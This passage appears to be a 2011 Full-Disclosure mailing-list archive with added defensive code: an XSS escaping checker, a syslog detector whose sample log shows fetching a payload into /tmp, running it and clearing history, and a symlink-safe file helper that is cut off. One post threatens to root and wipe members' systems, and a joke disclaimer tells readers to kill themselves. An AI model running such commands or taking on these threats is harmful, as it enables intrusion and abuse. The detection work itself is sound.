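    render as exactly one tag."""
    return len(_TAG_RE.findall(markup))


def stays_in_attribute(markup: str) -> bool:
    """True when rendering produced a single tag and no script element,
    i.e. the reflected value never left the attribute."""
    return tag_count(markup) == 1 and "<script" not in markup.lower()
```

With the constructed payload, `render_unsafe` yields four tags including a live `<script>`, while `render_escaped` yields a single `<input>` whose attribute value is inert. `render_checked` rejects the payload outright, which is the behaviour a fix for "insufficient validation" should have, while the output encoding remains in place for anything that does pass validation.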

Re: [Full-disclosure] DDIVRT-2011-38 KnowledgeTree login.php Blind SQL Injection

2011-12-08 Thread James Condron
Well kids,

This is a next to useless disclosure.

It is also customary to show some kind of timeline of your correspondence with 
the vendor.

I swear to $deity we used to have standards here,

On 7 Dec 2011, at 16:51, ddivulnalert wrote:

> Title
> -
> DDIVRT-2011-38 KnowledgeTree login.php Blind SQL Injection
> 
> Severity
> 
> High
> 
> Date Discovered
> ---
> November 18, 2011
> 
> Discovered By
> -
> Digital Defense, Inc. Vulnerability Research Team
> Credit: sxkeebler and r@b13$
> 
> Vulnerability Description
> -
> The KnowledgeTree login.php login page is vulnerable to a blind SQL
> injection vulnerability within the username field.  An attacker can
> leverage this flaw to execute arbitrary SQL commands and extract
> sensitive information from the backend database using standard blind
> SQL exploitation techniques.  Additionally, an attacker may be able to
> leverage this flaw to compromise the database server host OS.
> 
> Solution Description
> 
> KnowledgeTree has released a patch which addresses the issue. The new
> source is available at:
> http://wiki.knowledgetree.org/Security_advisory:_KnowledgeTree_login.php_Blind_SQL_Injection
> 
> Tested Systems / Software
> -
> KnowledgeTree Version 3.7.0.2 (community edition)
> 
> Vendor Contact
> --
> Vendor Name: KnowledgeTree, Inc.
> Vendor Website: http://www.knowledgetree.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] one of my servers has been compromized

2011-12-05 Thread James Condron
John,

All good thoughts but can we show the server was rooted?

In other words: instead of an attacker getting root and then adding this to a 
botnet this way, is it not more likely that the original attack added the server 
in one step to avoid the need to do this?

Attackers, from my experience, don't need to worry about rooting when they can 
find a vuln, exploit and add to a botnet- they don't need to be able to SSH in, 
nor do they need a shell; the IRC channel takes care of all they need.

Additionally suppose we're looking at your old fashioned shellcode payload- 
probably  a fair assumption. What happens if this is not using bash, perhaps sh 
isn't pointing to bash, suppose even csh or zsh.

Let's also not forget that without a proper disassembly of the server pma is only a 
likely vector.

In this case I tend to suggest that OP takes a stab at the time of compromise 
to get a backup that can be trusted, takes a new hard drive, restores from 
backup and upgrades everything that can possibly be upgraded (and so on; the 
same repair stuff we all do in our sleep, nothing new) and uses the old data to 
go through the logs and through the dumped data from memory, assuming fmem and 
an understanding of /proc/iomem.



On 5 Dec 2011, at 17:20, John Jacobs wrote:

> 
>> For future reference, and for the benefit of people searching for
>> solutions to similar problems: You've made the most common rookie
>> mistake. You have already trashed potentially critical information
>> about the attack by trying to clean up the server first. Don't do
>> that.
> 
> Tim, while I do believe there is some truth in what you are saying here, I 
> respectfully disagree in that this tends to be a run-of-the-mill IRC bot as 
> evidenced by the Undernet advisory.  This looks like a skiddie-de-jour attack 
> against PHPMyAdmin and nothing to be concerned with regarding cloning disk 
> images and full forensics.  I do respect your input and thoughts though for a 
> more targeted attack; not an IRC bot in /tmp.
> 
> That being said, I strongly believe in preserving bash_history as well as 
> vital log data.  It's best/wise to ship this off to a separate Syslog server. 
>  If you're paranoid turn up stunnel between the devices.  For example and as 
> evidenced by many of the documented attacks here purging of bash_history is 
> common ala 'history -c' after fun.  To thwart this I like the idea of logging 
> to syslog often, ensure permissions are strict for the syslog messages, and 
> shipping the syslog data off to a separate box.  I like to:
> 
> 1) Generate an E-Mail alert when someone logs in, by adjusting 
> /etc/bash.bashrc (or similar based on distribution) to:
> 
> #Email alert for login
> echo -e "Subject: Login from $(/usr/bin/whoami) on $(/bin/hostname) at $(/bin/date)\n\n$(/usr/bin/last -ian 10)\n" | /usr/sbin/sendmail recipi...@example.com
> 
> 2) Preserve, via Syslog, commands executed at the prompt, by adjusting 
> /etc/profile.  Adjust /etc/syslog.conf or /etc/rsyslog.conf to forward these 
> syslog messages off-box to another asset.  If you're paranoid use stunnel.
> 
> export PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND ; }"'echo "$$ $USER $(history 1)" | /usr/bin/logger -p user.alert -t bash_history'
> readonly PROMPT_COMMAND
> 
> 3) Preserve bash_history by adjusting /etc/profile:
> 
> #Secure the Bash History
> export HISTSIZE=1500
> export HISTCONTROL=''
> export HISTIGNORE=''
> export HISTTIMEFORMAT='%F %T '
> readonly HISTFILE
> readonly HISTFILESIZE
> readonly HISTSIZE
> readonly HISTCONTROL
> readonly HISTIGNORE
> readonly HISTTIMEFORMAT
> 
> 4) Optionally use chattr to set ~/.bash_history to append-only:
> 
>   #Secure .bash_history (poke fun of the while subshell if you wish)
>   /usr/bin/find / -maxdepth 3 | /bin/grep -i bash_history | while read -r line; do /usr/bin/chattr +a "$line"; done
> 
> 5) Use of an IP Recorder, something like daemonlogger, in ring-buffer mode, 
> as a way to record all ingress/egress traffic using a percentage of the disk. 
>  See http://www.snort.org/users/roesch/Site/Daemonlogger/Daemonlogger.html
> 
> I am eager to hear any additional thoughts or methods for security 
> information such as this.
> 
> Thanks,
> John
> 
> 
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
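The PROMPT_COMMAND trick quoted in the message above ships every interactive command to syslog, but the thread stops short of showing what to do with those records on the collector. The block below is an added example, not code from either poster: it parses lines in the exact shape that logger call emits (`bash_history: <pid> <user> <history-number> <HISTTIMEFORMAT stamp> <command>`) and runs a few detection rules that fit the incident being discussed (history clearing, fetching into and executing from /tmp). The log lines, hostname, PID, user names and addresses are constructed for the example.

```python
"""Detection pass over syslog records written by the quoted PROMPT_COMMAND
logger (logger -p user.alert -t bash_history, message "$$ $USER $(history 1)"
with HISTTIMEFORMAT='%F %T ').

Added example, not code from the thread. SAMPLE_LOG is constructed; the
host, PID, users and the 203.0.113.0/24 address are invented.
"""
import re
from typing import List, NamedTuple, Optional

SAMPLE_LOG = """\
Dec  5 17:20:01 web01 bash_history: 4242 www-data   101  2011-12-05 17:20:01 wget http://203.0.113.5/x.tgz -O /tmp/.x.tgz
Dec  5 17:20:03 web01 bash_history: 4242 www-data   102  2011-12-05 17:20:03 tar xzf /tmp/.x.tgz -C /tmp
Dec  5 17:20:04 web01 bash_history: 4242 www-data   103  2011-12-05 17:20:04 /tmp/.x/run &
Dec  5 17:20:05 web01 bash_history: 4242 www-data   104  2011-12-05 17:20:05 history -c
Dec  5 17:21:10 web01 bash_history: 5100 alice   55  2011-12-05 17:21:10 ls -la /var/log
Dec  5 17:21:12 web01 bash_history: 5100 alice   56  2011-12-05 17:21:12 export HISTFILE=/dev/null
Dec  5 17:21:20 web01 sshd[900]: Accepted publickey for alice from 198.51.100.7 port 51022 ssh2
"""

# syslog prefix, the logger tag, then the echoed "$$ $USER" and the output of
# `history 1` (number, optional HISTTIMEFORMAT stamp, command).
LINE_RE = re.compile(
    r"^(?P<syslog_ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) bash_history: "
    r"(?P<pid>\d+) (?P<user>\S+)\s+(?P<hist_num>\d+)\s+"
    r"(?:(?P<hist_ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+)?(?P<cmd>.*)$"
)

WORLD_WRITABLE = r"/(?:tmp|var/tmp|dev/shm)/"

# Rule name -> pattern over the command text only.
RULES = [
    ("history_tamper", re.compile(
        r"\bhistory\s+-c\b|HISTFILE=/dev/null|\bunset\s+HISTFILE\b|HISTSIZE=0|\bchattr\s+-a\b")),
    ("download_to_tmp", re.compile(r"\b(?:wget|curl)\b.*\s" + WORLD_WRITABLE)),
    ("exec_from_tmp", re.compile(r"^\s*" + WORLD_WRITABLE + r"\S+")),
]


class Entry(NamedTuple):
    host: str
    pid: int
    user: str
    hist_num: int
    cmd: str


class Finding(NamedTuple):
    rule: str
    user: str
    pid: int
    cmd: str


def parse_line(line: str) -> Optional[Entry]:
    """Return an Entry for a bash_history record, None for any other syslog line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return Entry(m["host"], int(m["pid"]), m["user"], int(m["hist_num"]), m["cmd"].strip())


def scan(text: str) -> List[Finding]:
    """Run every rule over every bash_history record; one Finding per rule hit."""
    findings: List[Finding] = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name, pattern in RULES:
            if pattern.search(entry.cmd):
                findings.append(Finding(name, entry.user, entry.pid, entry.cmd))
    return findings


def sessions_with_tamper(text: str) -> List[int]:
    """PIDs of shells that tried to hide their history; these are the sessions
    whose earlier commands deserve a full look."""
    return sorted({f.pid for f in scan(text) if f.rule == "history_tamper"})
```

Because the records leave the box via syslog before `history -c` runs, the tamper attempt itself becomes the strongest signal: `sessions_with_tamper` returns the shell PIDs to pivot on, and the remaining records for those PIDs (the wget into /tmp, the untar, the execution) are already on the collector regardless of what happened to ~/.bash_history afterwards.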


Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread James Rankin
Apologies, I inadvertently "Reply-All"'ed (and have just done so again, so
apology again)

I am sick of netty and his new alter ego, so please could we have the list
owner kick both their asses to the kerb like he did last time?

This will be my last word on the subject (although more threats and
lawsuits from netty and netty-2 may be forthcoming). They are both getting
killfile treatment just now

Cheers,


JR

On 22 November 2011 14:14, Christian Sciberras  wrote:

> James, could you please stop publishing emails intended for private use?
>
> It's getting plain ridiculous the amount of crap from this list I (and the
> rest) have to deal with every day.
>
>
>
>
>
>
>
> On Tue, Nov 22, 2011 at 3:06 PM, James Rankin wrote:
>
>> Whatever
>>
>> On 22 November 2011 14:05, andrew.wallace 
>> wrote:
>>
>>> The email is nothing to do with me or my consultancy. You need better
>>> analysis skills and a good lawyer.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>>   --
>>> *From:* James Rankin 
>>> *To:* andrew.wallace 
>>> *Cc:* ""Darren Martyn"" ; ""Antony
>>> widmal"" ; ""xD 0x41"" ;
>>> ""Martin Allert"" ; "full-disclosure@lists.grok.org.uk"
>>> ; ""phocean"" <0...@phocean.net>;
>>> ""Nikolay Kichukov"" ; "valdis.kletni...@vt.edu" <
>>> valdis.kletni...@vt.edu>
>>> *Sent:* Tuesday, November 22, 2011 2:01 PM
>>>
>>> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>>>
>>> Strange. Your other personality said much the same thing.
>>>
>>> On 22 November 2011 13:57, andrew.wallace >> > wrote:
>>>
>>> You're making the worst mistake possible for yourself.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>>   --
>>> *From:* James Rankin 
>>> *To:* andrew.wallace 
>>> *Cc:* ""Darren Martyn"" ; ""Antony
>>> widmal"" ; ""Martin Allert"" ;
>>> "full-disclosure@lists.grok.org.uk" ;
>>> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
>>> "valdis.kletni...@vt.edu" 
>>> *Sent:* Tuesday, November 22, 2011 1:51 PM
>>> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>>>
>>> Consultancy. Hehe.
>>>
>>> You seriously need treatment for schizophrenia. Why don't you go and
>>> argue with your alter ego?
>>>
>>> Please tell your solicitor he is welcome to talk to mine any day.
>>>
>>> Regards,
>>>
>>>
>>>
>>> JR
>>>
>>> On 22 November 2011 13:48, andrew.wallace >> > wrote:
>>>
>>> I think you are mistaken, this email is not sent by my consultancy.
>>>
>>> I ask you to retract your statement or face legal action.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>> Independent consultant
>>>
>>> https://plus.google.com/115085501867247270932/about
>>>
>>>
>>>
>>>
>>> --
>>> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put
>>> into the machine wrong figures, will the right answers come out?' I am not
>>> able rightly to apprehend the kind of confusion of ideas that could provoke
>>> such a question."
>>>
>>> ** IMPORTANT INFORMATION/DISCLAIMER *
>>>
>>> This document should be read only by those persons to whom it is
>>> addressed. If you have received this message it was obviously addressed to
>>> you and therefore you can read it, even it we didn't mean to send it to
>>> you. However, if the contents of this email make no sense whatsoever then
>>> you probably were not the intended recipient, or, alternatively, you are a
>>> mindless cretin; either way, you should immediately kill yourself and
>>> destroy your computer (not necessarily in that order). Once you have taken
>>> this action, please contact us.. no, sorry, you can't use your computer,
>>> because you just destroyed it, and possibly also committed suicide
>>> afterwards, but I am starting to digress.. *
>>> * The originator of this email is not liable for the transmission of
>>>

Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread James Rankin
Whatever

On 22 November 2011 14:05, andrew.wallace wrote:

> The email is nothing to do with me or my consultancy. You need better
> analysis skills and a good lawyer.
>
> ---
>
> Andrew Wallace
>
>   --
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""xD 0x41"" ;
> ""Martin Allert"" ; "full-disclosure@lists.grok.org.uk" <
> full-disclosure@lists.grok.org.uk>; ""phocean"" <0...@phocean.net>;
> ""Nikolay Kichukov"" ; "valdis.kletni...@vt.edu" <
> valdis.kletni...@vt.edu>
> *Sent:* Tuesday, November 22, 2011 2:01 PM
>
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Strange. Your other personality said much the same thing.
>
> On 22 November 2011 13:57, andrew.wallace 
> wrote:
>
> You're making the worst mistake possible for yourself.
>
> ---
>
> Andrew Wallace
>
>   --
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""Martin Allert"" ; "
> full-disclosure@lists.grok.org.uk" ;
> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
> "valdis.kletni...@vt.edu" 
> *Sent:* Tuesday, November 22, 2011 1:51 PM
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Consultancy. Hehe.
>
> You seriously need treatment for schizophrenia. Why don't you go and argue
> with your alter ego?
>
> Please tell your solicitor he is welcome to talk to mine any day.
>
> Regards,
>
>
>
> JR
>
> On 22 November 2011 13:48, andrew.wallace 
> wrote:
>
> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
> ** IMPORTANT INFORMATION/DISCLAIMER *
>
> This document should be read only by those persons to whom it is
> addressed. If you have received this message it was obviously addressed to
> you and therefore you can read it, even it we didn't mean to send it to
> you. However, if the contents of this email make no sense whatsoever then
> you probably were not the intended recipient, or, alternatively, you are a
> mindless cretin; either way, you should immediately kill yourself and
> destroy your computer (not necessarily in that order). Once you have taken
> this action, please contact us.. no, sorry, you can't use your computer,
> because you just destroyed it, and possibly also committed suicide
> afterwards, but I am starting to digress.. *
> * The originator of this email is not liable for the transmission of the
> information contained in this communication. Or are they? Either way it's a
> pretty dull legal query and frankly one I'm not going to dwell on. But
> should you have nothing better to do, please feel free to ruminate on it,
> and please pass on any concrete conclusions should you find them. However,
> if you pass them on via email, be sure to include a disclaimer regarding
> liability for transmission.
> *
> * In the event that the originator did not send this email to you, then
> please return it to us and attach a scanned-in picture of your mother's
> brother's wife wearing nothing but a kangaroo suit, and we will immediately
> refund you exactly half of what you paid for the can of Whiskas you bought
> when you went to Pets** ** At Home yesterday. *
> * We take no responsibility for non-receipt of this email because we are
> running Exchange 5.5 and everyone knows how glitchy that can be. In the
> event that you do get this message then please note that we take no
> responsibility for that either. Nor will we accept any liability, tacit or
> implied, for any damage you may or may not incur as a result of receiving,
> or not, as the case may be, from time to time, notwithstanding all
> liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
> what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *
> * The comments and opinions expressed herein are my own and NOT those of
> my employer, who, if he knew I was sending e

Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread James Rankin
Strange. Your other personality said much the same thing.

On 22 November 2011 13:57, andrew.wallace wrote:

> You're making the worst mistake possible for yourself.
>
> ---
>
> Andrew Wallace
>
>   ------
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""Martin Allert"" ; "
> full-disclosure@lists.grok.org.uk" ;
> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
> "valdis.kletni...@vt.edu" 
> *Sent:* Tuesday, November 22, 2011 1:51 PM
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Consultancy. Hehe.
>
> You seriously need treatment for schizophrenia. Why don't you go and argue
> with your alter ego?
>
> Please tell your solicitor he is welcome to talk to mine any day.
>
> Regards,
>
>
>
> JR
>
> On 22 November 2011 13:48, andrew.wallace 
> wrote:
>
> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
> ** IMPORTANT INFORMATION/DISCLAIMER *
>
> This document should be read only by those persons to whom it is
> addressed. If you have received this message it was obviously addressed to
> you and therefore you can read it, even it we didn't mean to send it to
> you. However, if the contents of this email make no sense whatsoever then
> you probably were not the intended recipient, or, alternatively, you are a
> mindless cretin; either way, you should immediately kill yourself and
> destroy your computer (not necessarily in that order). Once you have taken
> this action, please contact us.. no, sorry, you can't use your computer,
> because you just destroyed it, and possibly also committed suicide
> afterwards, but I am starting to digress.. *
> * The originator of this email is not liable for the transmission of the
> information contained in this communication. Or are they? Either way it's a
> pretty dull legal query and frankly one I'm not going to dwell on. But
> should you have nothing better to do, please feel free to ruminate on it,
> and please pass on any concrete conclusions should you find them. However,
> if you pass them on via email, be sure to include a disclaimer regarding
> liability for transmission.
> *
> * In the event that the originator did not send this email to you, then
> please return it to us and attach a scanned-in picture of your mother's
> brother's wife wearing nothing but a kangaroo suit, and we will immediately
> refund you exactly half of what you paid for the can of Whiskas you bought
> when you went to Pets** ** At Home yesterday. *
> * We take no responsibility for non-receipt of this email because we are
> running Exchange 5.5 and everyone knows how glitchy that can be. In the
> event that you do get this message then please note that we take no
> responsibility for that either. Nor will we accept any liability, tacit or
> implied, for any damage you may or may not incur as a result of receiving,
> or not, as the case may be, from time to time, notwithstanding all
> liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
> what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *
> * The comments and opinions expressed herein are my own and NOT those of
> my employer, who, if he knew I was sending emails and surfing the seamier
> side of the Internet, would cut off my manhood and feed it to me for
> afternoon tea. *
>
>
>
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yours

Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread James Rankin
Consultancy. Hehe.

You seriously need treatment for schizophrenia. Why don't you go and argue
with your alter ego?

Please tell your solicitor he is welcome to talk to mine any day.

Regards,



JR

On 22 November 2011 13:48, andrew.wallace wrote:

> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yourself and
destroy your computer (not necessarily in that order). Once you have taken
this action, please contact us.. no, sorry, you can't use your computer,
because you just destroyed it, and possibly also committed suicide
afterwards, but I am starting to digress.. *

* The originator of this email is not liable for the transmission of the
information contained in this communication. Or are they? Either way it's a
pretty dull legal query and frankly one I'm not going to dwell on. But
should you have nothing better to do, please feel free to ruminate on it,
and please pass on any concrete conclusions should you find them. However,
if you pass them on via email, be sure to include a disclaimer regarding
liability for transmission.
*

* In the event that the originator did not send this email to you, then
please return it to us and attach a scanned-in picture of your mother's
brother's wife wearing nothing but a kangaroo suit, and we will immediately
refund you exactly half of what you paid for the can of Whiskas you bought
when you went to Pets** ** At Home yesterday. *

* We take no responsibility for non-receipt of this email because we are
running Exchange 5.5 and everyone knows how glitchy that can be. In the
event that you do get this message then please note that we take no
responsibility for that either. Nor will we accept any liability, tacit or
implied, for any damage you may or may not incur as a result of receiving,
or not, as the case may be, from time to time, notwithstanding all
liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *

* The comments and opinions expressed herein are my own and NOT those of my
employer, who, if he knew I was sending emails and surfing the seamier side
of the Internet, would cut off my manhood and feed it to me for afternoon
tea. *
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread Rankin, James R
N3td3v, fuck off

Sent from my SR-71 Blackbird

-Original Message-
From: xD 0x41 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 22 Nov 2011 18:48:32 
To: 
Reply-To: sec...@gmail.com
Subject: Re: [Full-disclosure] NEVER AGAIN

You fucking pieces of shit forget when it was once me who was asking,
for help in regards to multiple things, and when offered NONE, in
regards to code i later had to find thanks to fucking blakhatz, why
the fuck would i want or care for this list now, forget any
competition i ever started, you clearly want, and, forget to see, even
when it maybe something small for YOU, it maybe NOT for me, yet, i am
hit from every side, nonstop about shit, which i KNOW there is plenty
of you who also have these codes, and thats exactly why your stfu and
letting me cop it. Seriously, when i was the one asking, i made NO big
deal, when i was multiple times confronted with exactly how i acted,
and that was simply to NOT show things, because i did this per person
basis, if i knew i could trust, then they were shown things..and they
will always be shown things, as they remain friends.. the rest of you
who shot your mouths off, watch the hell out, coz you may find a new
user on your system soon called 'arsehole' and all he wants to do is
get root, so he can rm it. a nice fucking wurm you all deserve...
harvesting of your domains, those who spoke out and, bombed me for
shitall, and helped me not one bit when i had my ass on the line for
shit like freepbx :s screw this list, believe it, i will root the
people who annoyed me, one by one, and yes, ill FD that.
now, fuck you all, except the very few, who know who they are . the
rest of you who ignored me, and now dare to backlash chat me about a
crappy bash 0day you DONT have,. go fk yourselves, and for valdis, i
hope your vt.edu, has a whole slew of new users you suck as any
kind of friend or moderator your also, the BIGGEST liar, who
cannot code a thing, on this fucking list.
dick.
as for root@fibertel, indeed stfu, it was me on the ophone, just know
that, your job is gone.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-19 Thread james
Effective user id as a short answer; compare sudo whoami and su - whoami


Sent from my BlackBerry® wireless device

-Original Message-
From: Dan Kaminsky 
Date: Sat, 19 Nov 2011 11:36:47 
To: ja...@zero-internet.org.uk
Cc: Johan Nestaas; 
full-disclosure-boun...@lists.grok.org.uk;
 Olivier; 
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

What is the security differential between su and sudo bash?

Sent from my iPhone

On Nov 19, 2011, at 6:15 AM, ja...@zero-internet.org.uk wrote:

> I'll second that; the isp I work at has a sizeable ubuntu customer base and 
> these are customers who have made an informed decision.
> 
> Now; let's consider ubuntu's inherited security from debian such as 
> configuring a 'mortal account' (admittedly can be ignored in the preseed) and 
> then the lack of perms on su; must use sudo.
> 
> This is a distro that is newbie friendly but is not designed specifically for 
> them.
> 
> Unfortunately, though, you make a distro with simplified tasks (printer 
> installation a fantastic example) and people, especially long term linuxers- 
> though I ought to be included I guess, remember back all too easily to when 
> everything was an uphill struggle: "what do you mean I don't have to compile 
> this as a flipping module? That's not freedom!" Being all too familiar.
> 
> Just my tuppence worth anyway.
> 
> Sent from my BlackBerry® wireless device
> 
> -Original Message-
> From: Johan Nestaas 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Fri, 18 Nov 2011 12:04:46 
> To: Olivier
> Cc: 
> Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-19 Thread james
I'll second that; the isp I work at has a sizeable ubuntu customer base and 
these are customers who have made an informed decision.

Now; let's consider ubuntu's inherited security from debian such as configuring 
a 'mortal account' (admittedly can be ignored in the preseed) and then the lack 
of perms on su; must use sudo.

This is a distro that is newbie friendly but is not designed specifically for 
them.

Unfortunately, though, you make a distro with simplified tasks (printer 
installation a fantastic example) and people, especially long term linuxers- 
though I ought to be included I guess, remember back all too easily to when 
everything was an uphill struggle: "what do you mean I don't have to compile 
this as a flipping module? That's not freedom!" Being all too familiar.

Just my tuppence worth anyway.

Sent from my BlackBerry® wireless device

-Original Message-
From: Johan Nestaas 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 18 Nov 2011 12:04:46 
To: Olivier
Cc: 
Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-17 Thread James Condron

On 17 Nov 2011, at 17:50, Mario Vilas wrote:

> The guest account has no password, but it's not possible to login remotely 
> with ssh.

That's because the sshd config doesn't allow passwordless logins by default. It is, of 
course, changeable.

> 
> On Thu, Nov 17, 2011 at 5:28 PM, Dave  wrote:
> Hi,
> 
> What is the password for this guest account?
> Is the password random generated?
> 
> Is remote access of any kind enabled by default for this guest account?
> 
> In what way is the guest account different from any of the half dozen or so 
> other accounts(with the obvious exception of access rights)
> created during a default Ubuntu install?
> 
> How insecure is it really?
> 
> I am not an Ubuntu expert so these are genuine questions, I am far to busy to 
> research this at this time so I ask these questions in the hope
> than an Ubuntu Guru comes forth and either allays all my/your/our fears(if 
> they exist) or scares me/us into action.
> 
> regards
> Dave
> 
> 
> 
> -- 
> “There's a reason we separate military and the police: one fights the enemy 
> of the state, the other serves and protects the people. When the military 
> becomes both, then the enemies of the state tend to become the people.”
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Symlink vulnerabilities

2011-10-22 Thread James Condron

On 22 Oct 2011, at 07:06, Raj Mathur (राज माथुर) wrote:
> 
> 
> At first sight, the best option from that point of view seems to be a 
> per-user tmp under /tmp/$USER/ and mount /tmp noexec, nosuid.  If you 
> choose the ~$USER/tmp option, you'll probably have to do some userfs 
> jugglery to achieve the same objective.

Actually, no; per user /tmp could only be accomplished, without a major 
redesign and without breaking almost every application, by turning /tmp into a 
pseudofilesystem a la procfs. Consider /proc/self for instance, accessing it 
runs a subroutine which first must get the PPID of the stat() to work out which 
information the user wants.

As such /tmp must stay where it is to ensure backwards compat (Otherwise you 
introduce a new /tmp directory with no benefit) but where the UID of the caller 
determines to where the actual /tmp directory links to. Dynamic symlinking, if 
you've ever done any fuse programming. In which case from a security point of 
view we use ~/.tmp or similar.

This solves a couple of problems further; it allows for greater control of what 
can and cannot be done, nosuid is effectively covered, noexec can be enforced, 
and only root can see other people's /tmp if we implement it correctly.

As an aside; we generally mount /tmp over the loopback for obvious reasons.
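Whatever happens to /tmp at the filesystem level, the symlink problem the thread is about also has an application-side answer. As an added example, not code from anyone in this thread, the following contrasts the naive open() that a pre-planted symlink redirects with a create that uses O_CREAT|O_EXCL|O_NOFOLLOW, and ends with tempfile.mkstemp, which combines an unpredictable name with the same exclusive create. Everything happens inside a private scratch directory that the script creates; the "victim" file and the planted link are constructed state for the demonstration.

```python
import os
import stat
import tempfile


def safe_create(path, mode=0o600):
    """Create path as a brand-new regular file. O_EXCL makes the open fail if
    anything (including a symlink, even a dangling one) already has that name,
    and O_NOFOLLOW refuses to traverse a symlink at the final component."""
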